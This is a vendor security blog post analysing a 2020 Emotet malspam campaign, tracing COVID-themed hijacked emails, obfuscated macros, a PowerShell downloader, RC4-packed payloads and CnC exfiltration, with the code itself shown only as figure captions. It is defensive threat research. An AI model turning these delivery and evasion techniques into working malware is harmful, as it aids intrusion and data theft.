• News
  • Security
  • Products
  • About Seqrite
Blogs on Information Technology, Network & Cybersecurity | Seqrite Blog
  • News
  • Security
  • Products
  • About Seqrite
Home  /  Cybersecurity • Emotet  /  The return of the Emotet as the world unlocks!
The return of the Emotet as the world unlocks!
29 September 2020

The return of the Emotet as the world unlocks!

Written by Prashant Tilekar
Prashant Tilekar
Cybersecurity, Emotet

A threat actor named Emotet Trojan has been in the wild for more than 5 years, and now it is back after a 5 months break. It has spread globally, infecting new as well as old targets. It is re-launched with multiple Malspam Campaigns to distribute in all sectors.

We observed through our detection telemetry that Emotet campaigns have targeted a variety of sectors. It is spread through SpamMail with hot topics like Covid-19, Vaccine for Covid-19 and few other generic keywords like Health Insurance, Payment, Invoice, Job Update/Opening, Cyberattack, Shipping and many more.

Infection chain

Fig 1: Infection chain
Fig 1: Infection chain

The infection chain starts by sending crafted emails to the target organization or person. The attacker uses the Hijacking email method for sending the crafted mails with an attachment. The attachment may contain a word document a macro file or a PDF. Sometimes the email body contains URLs too. As mailbox is hijacked, attachment is sent replying to old email threads or forwarding to an existing mail list, due to which the victim easily opens the attachment as the mail comes from a trusted mail id.

We encountered extensive count of spam mails, few of the examples are listed below-

Spam Mails

Fig 2. Example of Spam mails.
Fig 2. Example of Spam mails.

The attacker has done a silly mistake here, we can see in the mail that the subject and the attachment name doesn’t match. In most of the cases, an attachment name contains “Medical report Covid-19″.

Document Analysis

Office Document attachment contains a macro which contains a heavily obfuscated VBA code responsible to deliver payload in the chain.

Fig 3. Macro code in an attachment.
Fig 3. Macro code in an attachment.

After some de-obfuscation, the “Qndiwjphrk8an6x” function code is as below

{Qndiwjphrk8an6x = “winmgmt” + “:win32_” + “p” + “rocess”}

which translates into winmgmts:win32_process. Once we removed the chunked data we got a readable code with functions and reference variables.

One interesting part in the directory in Macros\Ofbszpwp168r\o.stm is that we can see some obfuscated data again.

Fig 4: Obfuscation in Doc file
Fig 4: Obfuscation in Doc file

After the initial level of de-obfuscation, we got base64 encoded PowerShell script as shown in below figure.

Fig 5: base64 Encoded PowerShell code
Fig 5: base64 Encoded PowerShell code

After decoding with base64 and processing data, we got the  below PowerShell script-

Fig 6: Base64 Decoded PowerShell script
Fig 6: Base64 Decoded PowerShell script

It contains malicious domains or URLs which serves Emotet executables. Using PowerShell commands Emotet executable is downloaded at “%temp%” directory in the victim’s machine.

Payload Analysis

The payload downloaded from the above file has a customized packer. The unpacking is done at runtime. Emotet’s packer code is polymorphic which makes it difficult for signature-based detection tools to detect it based on the packer code.

Its resource (.rsrc) section has significant data which seems to be an indication that the malware might be packed. In the below Fig. we can see that RCData has an encrypted code.

Fig 7: File having encrypted data in resource
Fig 7: File having encrypted data in resource

While debugging the file, we observed that the data will be decrypted using a slightly modified version of RC4. Key for RC4 is hardcoded in the file. After decryption, the control goes to the decrypted shellcode.

Fig 8: RC4 used for decryption
Fig 8: RC4 used for decryption

In some files, we have seen the use of VirtualAllocExNuma to allocate new memory. This is used for fast processing. The beginning of an obfuscated shellcode is copied to the new address after being decrypted using the modified RC4 algorithm. In addition to the relatively short shellcode, an additional PE can be seen in the memory.

Fig 9: Decrypted shellcode and PE File
Fig 9: Decrypted shellcode and PE File

The Shellcode deobfuscates several API calls at runtime, such as LoadLibraryA, GetProcAddress, VirtualAlloc and VirtualProtect, all of which will be used to resolve APIs and allocate memory to run the additional PE.

Fig 10: API Resolved
Fig 10: API Resolved

After this, the malware allocates memory and copies the data of decrypted file and calls  VirtualProtect and finally, the program jumps to the real entry point of the decrypted file.

Spreading mechanism of Emotet campaign remains almost the same that we had already discussed in our previous blog. Read it here in the link below.

https://blogs.quickheal.com/evolution-4-year-old-threat-emotet-infamous-trojan-complex-threat-distributer/

After executing the Emotet, it will exfiltrate the data to the CnC server. While sending, the data is encoded and sent with some random name of the file and random path to the server.

Fig11: CnC traffic
Fig11: CnC traffic

Detection hits stats

In Quick Heal detection, we have successfully detected such Emotet trojans. We have multiple detection layers like Email protection, Online protection and Behaviour detection to protect our customers.

Here is the detection stats number of hits per day in the last 45 days.

Fig 12: Graph
Fig 12: Graph

Conclusion

Emotet is a persistent threat actor and highly successful in delivering email-based malware, with a major focus on email theft and sending additional malware. It has moderate obfuscated code to deliver and bypass the detection technique.

With the global impact of COVID-19, threat actors are likely to continue to use COVID-19-themed emails to deliver malware broadly in support of their objectives for all sectors.

Quick Heal customers have long been protected from Emotet and other COVID-19-themed emails. We continue to track and report such attacks to keep our customers safe.

Subject Matter Experts:

Prashant Tilekar

Preksha Saxena

 Previous PostOperation SideCopy!
Next Post  The Evergreen ‘Make’ Utility: A cost-effective way of...
Prashant Tilekar

About Prashant Tilekar

Prashant Tilekar is part of the HIPS (Host-based Intrusion Prevention System) team in Quick Heal Security Labs. He has worked on various security vulnerabilities...

Articles by Prashant Tilekar »

Related Posts

  • Rethinking Design: Why Privacy Shouldn’t Be an Afterthought

    June 6, 2025
  • Trapped by a Call: The Digital Arrest Scam

    June 5, 2025
  • Operation Sindoor – Anatomy of a Digital Siege

    May 23, 2025
Featured Authors
  • Seqrite
    Seqrite

    Follow us for the latest updates and insights related to security for...

    Read more..
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is the Joint Managing Director of Quick Heal Technologies...

    Read more..
  • Mahua Chakrabarthy
    Mahua Chakrabarthy

    A tea connoisseur who firmly believes that life is too short for dull content....

    Read more..
Topics
apt (20) Cyber-attack (36) cyber-attacks (58) cyberattack (16) cyberattacks (13) Cybersecurity (324) cyber security (32) Cyber threat (33) cyber threats (48) Data (11) data breach (55) data breaches (28) data loss (28) data loss prevention (34) data privacy (12) data protection (25) data security (15) DLP (49) Encryption (16) endpoint security (108) Enterprise security (17) Exploit (14) firewall (11) GDPR (12) hackers (11) malware (76) malware attack (23) malware attacks (12) MDM (25) Microsoft (15) Network security (22) Patch Management (12) phishing (27) Ransomware (67) ransomware attack (30) ransomware attacks (30) ransomware protection (14) security (11) Seqrite (33) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) UTM (34) Vulnerability (16) windows (11)
Loading
Resources
  • White Papers
  • Datasheets
  • Threat Reports
  • Manuals
  • Case Studies
About Us
  • About Seqrite
  • Leadership
  • Awards & Certifications
  • Newsroom
Archives
  • By Date
  • By Category
Loading

© 2025 Quick Heal Technologies Ltd. Cookie Policies Privacy Policies